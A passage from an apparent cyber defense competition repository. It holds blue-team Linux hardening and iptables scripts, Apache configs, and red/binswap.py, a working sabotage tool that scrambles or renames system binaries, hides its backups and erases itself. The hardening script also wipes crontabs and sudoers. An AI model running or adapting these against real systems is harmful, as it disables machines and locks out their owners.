/$dir 33 | /bin/tar -rf ../notes.tar $dir.tar.bz 34 | done 35 | } 36 | 37 | #setting the net int down 38 | /sbin/ifconfig $1 down 39 | 40 | outfile=info.txt #set output file 41 | 42 | #backup important files and directories and fork before starting everything else 43 | backup &>.backup_info.txt &disown 44 | 45 | #cronjobs aka blowjob - remove cron for all users 46 | users=`/bin/cat /etc/passwd | grep -o '^\w*'` 47 | for user in $users; do 48 | crontab -r -u $user 49 | done &> /dev/null 50 | 51 | #destroy cron and anacron completely 52 | /bin/chown root:root /etc/cron* -R 53 | /bin/chmod o= /etc/cron* -R 54 | /bin/mv /etc/crontab /etc/.crontab.bak 55 | #/usr/bin/chattr +i -R /etc/cron* installing some stuff needs this 56 | /usr/bin/chattr +i /etc/.crontab.bak 57 | 58 | /bin/chown root:root /usr/bin/crontab 59 | /bin/chmod o= /usr/bin/crontab 60 | /usr/bin/chattr +i /usr/bin/crontab 61 | 62 | /usr/bin/chattr -i /etc/anacrontab 63 | /bin/chown root:root /etc/anacrontab 64 | /bin/chmod o= /etc/anacrontab 65 | /usr/bin/chattr +i /etc/anacrontab 66 | 67 | /bin/chown root:root /usr/sbin/anacron 68 | /bin/chmod o= /usr/sbin/anacron 69 | /usr/bin/chattr +i /usr/sbin/anacron 70 | 71 | /bin/chown root:root /etc/anacrontab 72 | /bin/mv /etc/anacrontab /etc/.anacrontab.bak 73 | /usr/bin/chattr +i /etc/anacrontab 74 | 75 | #calling iptables script to set all the ip tables rules and add to startup 76 | ./iptables.sh & 77 | test -e /etc/rc.local && /bin/cp /etc/rc.local /etc/rc.local 78 | echo "`pwd`/iptables.sh " > /etc/rc.local 79 | 80 | #stop usually unnecessary services 81 | services="cron crond cups samba smbd inetd portmap rsync rlogin" 82 | for service in $services; do 83 | /usr/bin/env service $service stop 84 | echo "/usr/bin/env service $service stop" >> /etc/rc.local 85 | done 86 | 87 | #determine distro to get package manage and int config location 88 | if [ -f /etc/redhat-release ] ; then 89 | pkmgr='/usr/bin/yum' 90 | #sys_netconfig="/etc/sysconfig/network-scripts/ifcfg-$1" 91 | elif [ -f /etc/debian_version ] ; then 92 | pkmgr='/usr/bin/apt-get' 93 | #sys_netconfig="/etc/network/interfaces" 94 | elif [ -f /etc/gentoo_version ]; then #possible might need this too: -f /etc/gentoo-release 95 | pkmgr='/usr/bin/emerge' 96 | /bin/ln -s /etc/init.d/net.lo /etc/init.d/net.$1 #create link so system recognizes net.lo file. needed for manual net config 97 | #sys_netconfig="/etc/conf.d/net" 98 | elif [ -f /etc/slackware-version ]; then 99 | pkmgr='/usr/bin/which installpkg' 100 | #sys_netconfig="/etc/rc.d/rc.inet1.conf" 101 | else 102 | echo "OS/distro not detected...using debian defaults..." >&2 103 | pkmgr='/usr/bin/apt-get' #if can't find OS, just use apt-get and hope for best 104 | #sys_netconfig="/etc/network/interfaces" 105 | fi 106 | 107 | #set static ip address, gateway and DNS 108 | /sbin/ifconfig $1 $IP_ADDR netmask $NETMASK 109 | /sbin/route add default gw $GATEWAY 110 | echo "nameserver 8.8.8.8" > /etc/resolv.conf 111 | echo "nameserver 8.8.4.4" >> /etc/resolv.conf 112 | #echo "nameserver $TEAM_DNS_SRV" >> /etc/resolv.conf 113 | 114 | #set hosts file location and do hosts file securing 115 | hosts="/etc/hosts" 116 | 117 | /usr/bin/chattr -i $hosts 118 | /bin/cp $hosts $hosts.backup 119 | echo "127.0.0.1 localhost" > $hosts 120 | echo "127.0.1.1 `hostname`" >> $hosts 121 | /bin/chown root:root $hosts 122 | /bin/chmod 600 $hosts 123 | /usr/bin/chattr +i $hosts 124 | 125 | #remove all users from the root group except for root. and some services possibly 126 | users=`/bin/cat /etc/passwd | grep -o '^\w*'` 127 | for user in $users; do 128 | usermod -R root $user 129 | done &> /dev/null 130 | 131 | #edit sudoers 132 | /bin/mv /etc/sudoers /etc/.sudoers.bak 133 | echo > /etc/sudoers 134 | /bin/chown root:root /etc/sudoers 135 | /bin/chmod 000 /etc/sudoers 136 | /usr/bin/chattr +i /etc/sudoers 137 | 138 | #put the interface back up ifconfig up $1 139 | /sbin/ifconfig $1 up 140 | 141 | #upgrading and updating everything 142 | bash -c "$pkmgr update -y && $pkmgr upgrade -y" &>.updateinfo.txt &disown 143 | 144 | #Make Sure No Non-Root Accounts Have UID Set To 0 145 | echo "Accounts with UID = 0" >> $outfile 146 | echo `/usr/bin/awk -F: '($3 == "0") {print}' /etc/passwd` >> $outfile 147 | echo >> $outfile 148 | 149 | #all listening ports 150 | echo "All the ports that you're listening on" >> $outfile 151 | echo `/usr/bin/lsof -nPi | /bin/grep -iF listen` >> $outfile 152 | echo >> $outfile 153 | 154 | #finding all of the world-writeable files 155 | echo "All of the world-writable files" >> $outfile 156 | echo `/usr/bin/find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print` >> $outfile &disown 157 | echo >> $outfile 158 | 159 | #find all suid bit files and remove suid bit if it seems like the binary doesn't need it 160 | #is not tested, needs more binaries to be added to the check in the if statement! 161 | badFiles=`/usr/bin/find / -type f \( -perm -04000 -o -perm -02000 \)` 162 | for file in $badFiles; do 163 | if [ "`/bin/grep -iP '.*passwd.*|su|ping|.*mount.*|crontab'`" = "" ]; then 164 | /bin/chmod u-s "$file" 165 | echo "got rid of suid bit on '$file'" >> $outfile 166 | fi 167 | done 168 | 169 | # #finding all of the no owner files 170 | # echo "All of the no owner files" >> $outfile 171 | # /usr/bin/find / -xdev \( -nouser -o -nogroup \) -print >> $outfile 172 | # echo "" >> $outfile 173 | 174 | #rename certain executables and chattr them 175 | /bin/mv /usr/bin/gcc /usr/bin/zgcc 176 | /usr/bin/chattr +i /usr/bin/zgcc 177 | /bin/mv /sbin/reboot /sbin/zreboot 178 | /usr/bin/chattr +i /sbin/zreboot 179 | /bin/mv /sbin/shutdown /sbin/zshutdown 180 | /usr/bin/chattr +i /sbin/zshutdown 181 | 182 | #makes the jail. if /var/jail taken, somewhat random directory attempted to be made in hopes it doesn't exist 183 | if [ ! -e /var/jail ]; then 184 | ./jail_maker.sh -s /var/jail 185 | else 186 | let first="$RANDOM % 100" 187 | let second="$RANDOM % 100" 188 | ./jail_maker.sh -s /var/jail_${first}-${second} 189 | fi 190 | -------------------------------------------------------------------------------- /blue/iptables.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #set path of iptables 3 | path=/sbin 4 | #shitboxIP=10.0.0.0 5 | #scoremaster=10.0.0.0 6 | 7 | #drop all previous rules 8 | $path/iptables -F 9 | $path/ip6tables -F 10 | 11 | #block typical bad stuff 12 | $path/iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP #null packets 13 | $path/iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP #syn-flood packets 14 | $path/iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP #XMAS packets (recon) 15 | $path/iptables -A INPUT -m state --state INVALID -j DROP #invalid packets 16 | 17 | # Accept in/out from loopback 18 | $path/iptables -A INPUT -i lo -j ACCEPT 19 | $path/iptables -A OUTPUT -o lo -j ACCEPT 20 | 21 | # Allow icmp request/reply from and to host 22 | $path/iptables -A INPUT -p icmp --icmp-type 0 -j ACCEPT 23 | $path/iptables -A OUTPUT -p icmp --icmp-type 0 -j ACCEPT 24 | $path/iptables -A INPUT -p icmp --icmp-type 8 -j ACCEPT 25 | $path/iptables -A OUTPUT -p icmp --icmp-type 8 -j ACCEPT 26 | 27 | # Allow established TCP connections to re-enter 28 | $path/iptables -A INPUT -m state --state ESTABLISHED -j ACCEPT 29 | 30 | # Allow HTTP and HTTPS in and out for server and client 31 | $path/iptables -A OUTPUT -p tcp -m multiport --sports 80,443 -j ACCEPT #server outbound 32 | $path/iptables -A INPUT -p tcp -m multiport --dports 80,443 -j ACCEPT #server inbound 33 | $path/iptables -A OUTPUT -p tcp -m multiport --dports 80,443 -j ACCEPT #client outbound 34 | #$path/iptables -A INPUT -p tcp -m multiport --sports 80,443 -j ACCEPT #client inbound - shouldn't need as long as you allow established tcp connections back in 35 | 36 | # Allow MySQL queries as a client 37 | #$path/iptables -A INPUT -p tcp -m tcp --sport 3306 -j ACCEPT 38 | #$path/iptables -A OUTPUT -p tcp -m tcp --dport 3306 -j ACCEPT 39 | 40 | # Allow MySQL queries as a server 41 | #$path/iptables -A INPUT -p tcp -m tcp --dport 3306 -j ACCEPT 42 | #$path/iptables -A OUPUT -p tcp -m tcp --sport 3306 -j ACCEPT 43 | 44 | # Allow DNS queries as a client 45 | $path/iptables -A INPUT -p udp --sport 53 -j ACCEPT 46 | $path/iptables -A INPUT -p tcp --sport 53 -j ACCEPT #needed for large zone transfers 47 | $path/iptables -A OUTPUT -p udp --dport 53 -j ACCEPT 48 | $path/iptables -A OUTPUT -p tcp --dport 53 -j ACCEPT #needed for large zone transfers 49 | 50 | #allow DNS queries as a server 51 | #$path/iptables -A INPUT -p udp --dport 53 -j ACCEPT 52 | #$path/iptables -A INPUT -p tcp --dport 53 -j ACCEPT #needed for large zone transfers 53 | #$path/iptables -A OUTPUT -p udp --sport 53 -j ACCEPT 54 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 53 -j ACCEPT #needed for large zone transfers 55 | 56 | # Allow DHCP client traffic 57 | #$path/iptables -A INPUT -p udp --dport 68 -j ACCEPT 58 | #$path/iptables -A OUTPUT -p udp --sport 68 -j ACCEPT 59 | 60 | # Allow DHCP server traffic 61 | #$path/iptables -A INPUT -p udp --dport 67 -j ACCEPT 62 | #$path/iptables -A OUTPUT -p udp --sport 67 -j ACCEPT 63 | 64 | #allow ssh in and out for a server 65 | #$path/iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT 66 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT 67 | 68 | #allow ssh out for a client 69 | $path/iptables -A INPUT -p tcp -m tcp --sport 22 -j ACCEPT 70 | $path/iptables -A OUTPUT -p tcp -m tcp --dport 22 -j ACCEPT 71 | 72 | #allow FTP server traffic; only for ftp servers! 73 | #$path/iptables -A INPUT -p tcp -m tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT #initial connection 74 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 21 -m state --state NEW,ESTABLISHED -j ACCEPT #initial connection 75 | #$path/iptables -A INPUT -p tcp -m tcp --dport 20 -m state --state NEW,ESTABLISHED -j ACCEPT #active mode 76 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 20 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT #active mode 77 | #$path/iptables -A INPUT -p tcp -m tcp --sport 1024:65535 --dport 1024:65535 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT #passive 78 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 1024:65535 --dport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT #passive 79 | 80 | #smtp in/out rules; only for smtp servers! 81 | #$path/iptables -A INPUT -p tcp -m tcp --dport 25 -j ACCEPT 82 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 25 -j ACCEPT 83 | 84 | #allow opsview agent in/out to specific IP address (if using monitoring service) 85 | #monServer=127.0.0.1 #<-replace with IP of monitoring server 86 | #$path/iptables -A INPUT -p tcp -s $monServer --dport 5666 -j ACCEPT 87 | #$path/iptables -A OUTPUT -p tcp -d $monServer --sport 5666 -j ACCEPT 88 | 89 | #TODO, rules for POP and/or IMAP 90 | 91 | #VOIP - needed for asterisk/voip server! 92 | # SIP on UDP port 5060. Other SIP servers may need TCP port 5060 as well 93 | #$path/iptables -A INPUT -p udp -m udp --dport 5060 -j ACCEPT 94 | #$path/iptables -A INPUT -p udp -m udp --dport 4569 -j ACCEPT # IAX2- the IAX protocol 95 | #$path/iptables -A INPUT -p udp -m udp --dport 5036 -j ACCEPT # IAX - most have switched to IAX v2, or ought to 96 | # RTP - the media stream 97 | #$path/iptables -A INPUT -p udp -m udp --dport 10000:20000 -j ACCEPT # (related to the port range in /etc/asterisk/rtp.conf) 98 | #$path/iptables -A INPUT -p udp -m udp --dport 2727 -j ACCEPT # MGCP - if you use media gateway control protocol in your configuration 99 | 100 | # Log firewall hits 101 | $path/iptables -A INPUT -m limit --limit 15/min -j LOG --log-level 4 --log-prefix "INv4 " 102 | $path/iptables -A OUTPUT -m limit --limit 15/min -j LOG --log-level 4 --log-prefix "OUTv4 " 103 | $path/ip6tables -A INPUT -m limit --limit 3/min -j LOG --log-level 4 --log-prefix "INv6 " 104 | $path/ip6tables -A OUTPUT -m limit --limit 3/min -j LOG --log-level 4 --log-prefix "OUTv6 " 105 | 106 | # Drop all other stuff 107 | $path/iptables -A INPUT -j DROP 108 | $path/iptables -A OUTPUT -j DROP 109 | $path/ip6tables -A INPUT -j DROP 110 | $path/ip6tables -A OUTPUT -j DROP 111 | 112 | # INSTATE THESE RULES ON HOST TO PROTECT 113 | # This will reroute non-scoring engine traffic to a honeypot and allow the traffic to be routed back from 114 | # that honeypot to the original sender. 115 | # NOTE: vsftpd needs pasv_promiscuous=yes for "fake" ftp 116 | 117 | # echo "1" > /proc/sys/net/ipv4/ip_forward 118 | # $path/iptables -D INPUT -j DROP 119 | # $path/iptables -D OUTPUT -j DROP 120 | # $path/iptables -t nat -A PREROUTING -p tcp -j DNAT --to-destination $shitboxIP #Make all traffic go to the playground 121 | # $path/iptables -t nat -A POSTROUTING -d $shitboxIP -p tcp -j MASQUERADE 122 | # $path/iptables -t nat -I PREROUTING -p tcp -s $scoremaster -j ACCEPT #Accept all traffic from the scorebox 123 | 124 | # $path/iptables -t nat -A PREROUTING -p udp -j DNAT --to-destination $shitboxIP #Make all traffic go to the playground 125 | # $path/iptables -t nat -A POSTROUTING -d $shitboxIP -p udp -j MASQUERADE 126 | # $path/iptables -t nat -I PREROUTING -p udp -s $scoremaster -j ACCEPT #Accept all traffic from the scorebox 127 | 128 | #$path/iptables -I INPUT -d $shitboxIP -j ACCEPT 129 | #$path/iptables -I FORWARD -d $shitboxIP -j ACCEPT 130 | #$path/iptables -I OUTPUT -d $shitboxIP -j ACCEPT 131 | #$path/iptables -I INPUT -s $shitboxIP -j ACCEPT 132 | #$path/iptables -I FORWARD -s $shitboxIP -j ACCEPT 133 | #$path/iptables -I OUTPUT -s $shitboxIP -j ACCEPT 134 | 135 | -------------------------------------------------------------------------------- /red/binswap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from sys import exit, argv 3 | import platform 4 | import os 5 | from random import choice 6 | import itertools 7 | from multiprocessing import Process 8 | from pickle import dump, load 9 | import shutil 10 | from hashlib import md5 11 | 12 | #TODO: 13 | # 1. figure out what binaries are needed to login successfully so we don't swap those. 14 | # 2. add a prompt to self erase after a revert, but timeout after like 5-10 seconds and 15 | # default to no 16 | 17 | operatingSystem = platform.system().lower() #detect OS 18 | if operatingSystem == "windows": #set up some vars for specific OSes 19 | slash = "\\" 20 | dest = "C:\\Windows\\bin_locale" #directory where binaries will be backed up 21 | backfile = "C:\Windows\Globalization\Global.nls" #backup/revert file 22 | else: 23 | slash = "/" 24 | dest = "/lib/lib-udev" #directory where binaries will be backed up 25 | backfile = "/var/local/opt" #backup/revert file 26 | 27 | #print help 28 | def help(): 29 | print "-R, --random To randomly rename binaries instead of swapping them" 30 | print "-r, --revert To revert from disaster" 31 | 32 | #swap two given values in a list 33 | def swap(xs, a, b): 34 | xs[a], xs[b] = xs[b], xs[a] 35 | 36 | #find one derangement of the given list, xs 37 | def derange(xs): 38 | for a in xrange(1, len(xs)): 39 | b = choice(xrange(0, a)) 40 | swap(xs, a, b) 41 | 42 | #shuffle binaries 43 | def shuffle(keys, oldDict, newDict): 44 | for key in keys: 45 | shutil.move(dest + oldDict[key], newDict[key]) 46 | 47 | #put the binaries back to where they should be 48 | def unshuffle(oldDict, newDict): 49 | for key in newDict.keys(): 50 | shutil.move(dest + newDict[key], oldDict[key]) 51 | 52 | #backup the binary files 53 | def backup(myDict, directories, revert=0): 54 | cmd = "" 55 | if operatingSystem == "windows": 56 | mkdirBin = "mkdir" 57 | else: #linux! 58 | if revert: 59 | mkdirBin = "/var/mkdir" 60 | else: #if we're not reverting, make backups of python and mkdir 61 | cmd = ("/bin/cp `which mkdir` /var/mkdir;" 62 | "/bin/cp `which python` /var/spool/python;") 63 | mkdirBin = "/usr/bin/env mkdir" 64 | 65 | cmd = cmd + "%s -p \"%s\";" % (mkdirBin, dest) #create initial backup dir 66 | 67 | for myDir in directories: #remake directory structure 68 | cmd = cmd + "%s -p \"%s%s\";" % (mkdirBin, dest, myDir) 69 | 70 | os.system(cmd) #create directories needed 71 | 72 | #should work cross platform 73 | for key, value in myDict.iteritems(): #backup the actual binaries 74 | shutil.copy(value, dest + value) 75 | 76 | #get all files from the directories given and place them in a dictionary 77 | def getFiles(directories): 78 | myDict = {} 79 | for myDir in directories: #traverse given dirs 80 | if os.path.isdir(myDir): #if dir exists traverse files in it 81 | for myBin in os.listdir(myDir): 82 | #if windows 83 | if operatingSystem == "windows": 84 | #if not an executable or if cmd or python, skip it 85 | if myBin[-4:] != ".exe" or myBin == "cmd.exe" or "python" in myBin: 86 | continue 87 | #if linux 88 | else: #if a shell, env or python, skip it 89 | if (myBin == "sh" or myBin == "bash" or myBin == "csh" or myBin == "zsh" 90 | or myBin == "env" or myBin == "tcsh" or myBin == "dash" 91 | or myBin == "ash" or "python" in myBin): 92 | continue 93 | 94 | fullBin = "%s%s%s" % (myDir, slash, myBin) 95 | if os.path.isfile(fullBin): #make sure it's a file not a dir 96 | myDict[myBin] = fullBin 97 | #not tested, but this should recurse through all directories which would be useful 98 | #for the "Program Files" directory. should look into this. might be bad for 99 | #C:\windows since that's a huge dir with a lot of dirs in it 100 | #elif operatingSystem == "windows": 101 | # return getFiles([myBin]) 102 | 103 | return myDict 104 | 105 | #main binary swapping function 106 | def binswap(rename=0): 107 | global dest #so our change to dest takes place when used in other functions 108 | 109 | #pick directories based on OS 110 | if operatingSystem == "windows": 111 | dirs = ["C:\Windows", "C:\Windows\System32"] 112 | else: 113 | dirs = ["/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin", "/usr/local/sbin"] 114 | 115 | #get the files into a dictionary 116 | oldDict = getFiles(dirs) 117 | 118 | #if just swapping, create backups of all the binaries so we can copy things properly 119 | #during the shuffle 120 | if not rename: 121 | backupThread = Process(target=backup, args=(oldDict,dirs,)) 122 | backupThread.start() 123 | 124 | #create copy of dict and generate list of keys. 125 | newDict = oldDict.copy() 126 | oldKeys = oldDict.keys() 127 | 128 | if rename: #if randomly renaming binaries 129 | dest = "" #set dest to nothing since we won't be moving from the backup dir 130 | 131 | #loop through and change the values to be random in the newDict 132 | #the new random value will consist of a random combination of the beginning of the md5 133 | #hash of the string, the last two characters of that hash, then a random number (0,99) 134 | for myKey in oldKeys: 135 | keyHash = md5(myKey).hexdigest() 136 | newName = (keyHash[choice(range(0,2)):choice(range(5,7))] + keyHash[-2:] 137 | + str(choice(range(0,99)))) 138 | 139 | #get the full path before the binary name 140 | lastSlash = str.rfind(newDict[myKey], slash) 141 | newName = newDict[myKey][:lastSlash + 1] + newName 142 | 143 | if operatingSystem == "windows": #if windows, append .exe because file extensions 144 | newName = newName + ".exe" 145 | 146 | newDict[myKey] = newName 147 | else: #if swapping binaries 148 | #get a copy of the list of keys, then find a derangement of that 149 | newKeys = list(oldKeys) 150 | derange(newKeys) 151 | 152 | #shuffle the key:value pairs 153 | for oldKey, newKey in zip(oldKeys, newKeys): 154 | newDict[newKey] = oldDict[oldKey] 155 | 156 | #wait till thread is done and make sure it succeeded 157 | backupThread.join() 158 | if backupThread.exitcode != 0: 159 | print "backing up failed. exiting..." 160 | return(backupThread.exitcode) 161 | 162 | #shuffle/rename the binaries! 163 | shuffleThread = Process(target=shuffle, args=(oldKeys, oldDict, newDict,)) 164 | shuffleThread.start() 165 | 166 | #prepare for revert 167 | with open(backfile, 'wb') as outfile: 168 | dump([oldDict, newDict, rename], outfile) 169 | 170 | shuffleThread.join() #wait for shuffling to finish before ending 171 | os.system("echo > %s" % argv[0]) #self erase 172 | print "done swapping" 173 | return 0 174 | 175 | #revert binaries back to original 176 | def revert(): 177 | global dest #so our change to dest takes place when used in other functions 178 | 179 | #pick directories based on OS 180 | if operatingSystem == "windows": 181 | dirs = ["C:\Windows", "C:\Windows\System32"] 182 | else: 183 | dirs = ["/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin", "/usr/local/sbin"] 184 | 185 | #grab oldDict, newDict and type of reversion from file 186 | if os.path.exists(backfile): 187 | with open(backfile, 'rb') as infile: 188 | oldDict, newDict, rename = load(infile) 189 | else: 190 | print "cannot find backup file, ya screwed" 191 | return 1 192 | 193 | #if we just renamed randomly, set dest to nothing bc we aren't moving binaries from that dir 194 | if rename: 195 | dest = "" 196 | else:#if we swapped, create copies of the binaries 197 | backup(oldDict, dirs, revert=1) 198 | 199 | #put binaries back in place 200 | unshuffle(oldDict, newDict) 201 | 202 | print "done reverting" 203 | return 0 204 | 205 | if __name__ == "__main__": 206 | if len(argv) > 1: #check the arg if we have any 207 | #if they want to revert a previous action 208 | if argv[1] == "-r" or argv[1] == "--revert" or argv[1] == "revert" or argv[1] == "-revert": 209 | exit(revert()) 210 | #if they want to randomly rename binaries 211 | elif argv[1] == "-R" or argv[1] == "--random" or argv[1] == "random" or argv[1] == "-random": 212 | exit(binswap(rename=1)) 213 | elif "help" in argv[1]: 214 | help() 215 | else: #if arg didn't match, swap away! 216 | exit(binswap()) 217 | else: #if no args, just swap! 218 | exit(binswap()) 219 | -------------------------------------------------------------------------------- /blue/apache2/default: -------------------------------------------------------------------------------- 1 | 2 | 3 | ServerAdmin webmaster@localhost 4 | ServerName <>:443 5 | DocumentRoot /var/www 6 | 7 | Options FollowSymLinks 8 | AllowOverride None 9 | 10 | 11 | Options Indexes FollowSymLinks MultiViews 12 | AllowOverride None 13 | Order allow,deny 14 | allow from all 15 | 16 | 17 | ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ 18 | 19 | AllowOverride None 20 | Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch 21 | Order allow,deny 22 | Allow from all 23 | 24 | 25 | ErrorLog ${APACHE_LOG_DIR}/error.log 26 | 27 | # Possible values include: debug, info, notice, warn, error, crit, 28 | # alert, emerg. 29 | LogLevel warn 30 | 31 | CustomLog ${APACHE_LOG_DIR}/ssl_access.log combined 32 | 33 | Alias /doc/ "/usr/share/doc/" 34 | 35 | Options Indexes MultiViews FollowSymLinks 36 | AllowOverride None 37 | Order deny,allow 38 | Deny from all 39 | Allow from 127.0.0.0/255.0.0.0 ::1/128 40 | 41 | 42 | # SSL Engine Switch: 43 | # Enable/Disable SSL for this virtual host. 44 | SSLEngine on 45 | 46 | # A self-signed (snakeoil) certificate can be created by installing 47 | # the ssl-cert package. See 48 | # /usr/share/doc/apache2.2-common/README.Debian.gz for more info. 49 | # If both key and certificate are stored in the same file, only the 50 | # SSLCertificateFile directive is needed. 51 | SSLCertificateFile /etc/apache2/ssl/apache.crt 52 | SSLCertificateKeyFile /etc/apache2/ssl/apache.key 53 | 54 | # Server Certificate Chain: 55 | # Point SSLCertificateChainFile at a file containing the 56 | # concatenation of PEM encoded CA certificates which form the 57 | # certificate chain for the server certificate. Alternatively 58 | # the referenced file can be the same as SSLCertificateFile 59 | # when the CA certificates are directly appended to the server 60 | # certificate for convinience. 61 | #SSLCertificateChainFile /etc/apache2/ssl.crt/server-ca.crt 62 | 63 | # Certificate Authority (CA): 64 | # Set the CA certificate verification path where to find CA 65 | # certificates for client authentication or alternatively one 66 | # huge file containing all of them (file must be PEM encoded) 67 | # Note: Inside SSLCACertificatePath you need hash symlinks 68 | # to point to the certificate files. Use the provided 69 | # Makefile to update the hash symlinks after changes. 70 | #SSLCACertificatePath /etc/ssl/certs/ 71 | #SSLCACertificateFile /etc/apache2/ssl.crt/ca-bundle.crt 72 | 73 | # Certificate Revocation Lists (CRL): 74 | # Set the CA revocation path where to find CA CRLs for client 75 | # authentication or alternatively one huge file containing all 76 | # of them (file must be PEM encoded) 77 | # Note: Inside SSLCARevocationPath you need hash symlinks 78 | # to point to the certificate files. Use the provided 79 | # Makefile to update the hash symlinks after changes. 80 | #SSLCARevocationPath /etc/apache2/ssl.crl/ 81 | #SSLCARevocationFile /etc/apache2/ssl.crl/ca-bundle.crl 82 | 83 | # Client Authentication (Type): 84 | # Client certificate verification type and depth. Types are 85 | # none, optional, require and optional_no_ca. Depth is a 86 | # number which specifies how deeply to verify the certificate 87 | # issuer chain before deciding the certificate is not valid. 88 | #SSLVerifyClient require 89 | #SSLVerifyDepth 10 90 | 91 | # Access Control: 92 | # With SSLRequire you can do per-directory access control based 93 | # on arbitrary complex boolean expressions containing server 94 | # variable checks and other lookup directives. The syntax is a 95 | # mixture between C and Perl. See the mod_ssl documentation 96 | # for more details. 97 | # 98 | #SSLRequire ( %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \ 99 | # and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \ 100 | # and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \ 101 | # and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \ 102 | # and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20 ) \ 103 | # or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/ 104 | # 105 | 106 | # SSL Engine Options: 107 | # Set various options for the SSL engine. 108 | # o FakeBasicAuth: 109 | # Translate the client X.509 into a Basic Authorisation. This means that 110 | # the standard Auth/DBMAuth methods can be used for access control. The 111 | # user name is the `one line' version of the client's X.509 certificate. 112 | # Note that no password is obtained from the user. Every entry in the user 113 | # file needs this password: `xxj31ZMTZzkVA'. 114 | # o ExportCertData: 115 | # This exports two additional environment variables: SSL_CLIENT_CERT and 116 | # SSL_SERVER_CERT. These contain the PEM-encoded certificates of the 117 | # server (always existing) and the client (only existing when client 118 | # authentication is used). This can be used to import the certificates 119 | # into CGI scripts. 120 | # o StdEnvVars: 121 | # This exports the standard SSL/TLS related `SSL_*' environment variables. 122 | # Per default this exportation is switched off for performance reasons, 123 | # because the extraction step is an expensive operation and is usually 124 | # useless for serving static content. So one usually enables the 125 | # exportation for CGI and SSI requests only. 126 | # o StrictRequire: 127 | # This denies access when "SSLRequireSSL" or "SSLRequire" applied even 128 | # under a "Satisfy any" situation, i.e. when it applies access is denied 129 | # and no other module can change it. 130 | # o OptRenegotiate: 131 | # This enables optimized SSL connection renegotiation handling when SSL 132 | # directives are used in per-directory context. 133 | #SSLOptions +FakeBasicAuth +ExportCertData +StrictRequire 134 | 135 | SSLOptions +StdEnvVars 136 | 137 | 138 | SSLOptions +StdEnvVars 139 | 140 | 141 | # SSL Protocol Adjustments: 142 | # The safe and default but still SSL/TLS standard compliant shutdown 143 | # approach is that mod_ssl sends the close notify alert but doesn't wait for 144 | # the close notify alert from client. When you need a different shutdown 145 | # approach you can use one of the following variables: 146 | # o ssl-unclean-shutdown: 147 | # This forces an unclean shutdown when the connection is closed, i.e. no 148 | # SSL close notify alert is send or allowed to received. This violates 149 | # the SSL/TLS standard but is needed for some brain-dead browsers. Use 150 | # this when you receive I/O errors because of the standard approach where 151 | # mod_ssl sends the close notify alert. 152 | # o ssl-accurate-shutdown: 153 | # This forces an accurate shutdown when the connection is closed, i.e. a 154 | # SSL close notify alert is send and mod_ssl waits for the close notify 155 | # alert of the client. This is 100% SSL/TLS standard compliant, but in 156 | # practice often causes hanging connections with brain-dead browsers. Use 157 | # this only for browsers where you know that their SSL implementation 158 | # works correctly. 159 | # Notice: Most problems of broken clients are also related to the HTTP 160 | # keep-alive facility, so you usually additionally want to disable 161 | # keep-alive for those clients, too. Use variable "nokeepalive" for this. 162 | # Similarly, one has to force some clients to use HTTP/1.0 to workaround 163 | # their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and 164 | # "force-response-1.0" for this. 165 | BrowserMatch "MSIE [2-6]" \ 166 | nokeepalive ssl-unclean-shutdown \ 167 | downgrade-1.0 force-response-1.0 168 | # MSIE 7 and newer should be able to use keepalive 169 | BrowserMatch "MSIE [17-9]" ssl-unclean-shutdown 170 | 171 | 172 | 173 | -------------------------------------------------------------------------------- /blue/httpd/httpd.conf: -------------------------------------------------------------------------------- 1 | ServerTokens Prod 2 | 3 | ServerRoot "/etc/httpd" 4 | 5 | PidFile run/httpd.pid 6 | 7 | Timeout 60 8 | 9 | KeepAlive Off 10 | 11 | MaxKeepAliveRequests 100 12 | 13 | KeepAliveTimeout 15 14 | 15 | 16 | 17 | StartServers 8 18 | MinSpareServers 5 19 | MaxSpareServers 20 20 | ServerLimit 256 21 | MaxClients 256 22 | MaxRequestsPerChild 4000 23 | 24 | 25 | 26 | StartServers 4 27 | MaxClients 300 28 | MinSpareThreads 25 29 | MaxSpareThreads 75 30 | ThreadsPerChild 25 31 | MaxRequestsPerChild 0 32 | 33 | 34 | Listen 80 35 | 36 | LoadModule auth_basic_module modules/mod_auth_basic.so 37 | LoadModule auth_digest_module modules/mod_auth_digest.so 38 | LoadModule authn_file_module modules/mod_authn_file.so 39 | LoadModule authn_alias_module modules/mod_authn_alias.so 40 | LoadModule authn_anon_module modules/mod_authn_anon.so 41 | LoadModule authn_dbm_module modules/mod_authn_dbm.so 42 | LoadModule authn_default_module modules/mod_authn_default.so 43 | LoadModule authz_host_module modules/mod_authz_host.so 44 | LoadModule authz_user_module modules/mod_authz_user.so 45 | LoadModule authz_owner_module modules/mod_authz_owner.so 46 | LoadModule authz_groupfile_module modules/mod_authz_groupfile.so 47 | LoadModule authz_dbm_module modules/mod_authz_dbm.so 48 | LoadModule authz_default_module modules/mod_authz_default.so 49 | LoadModule 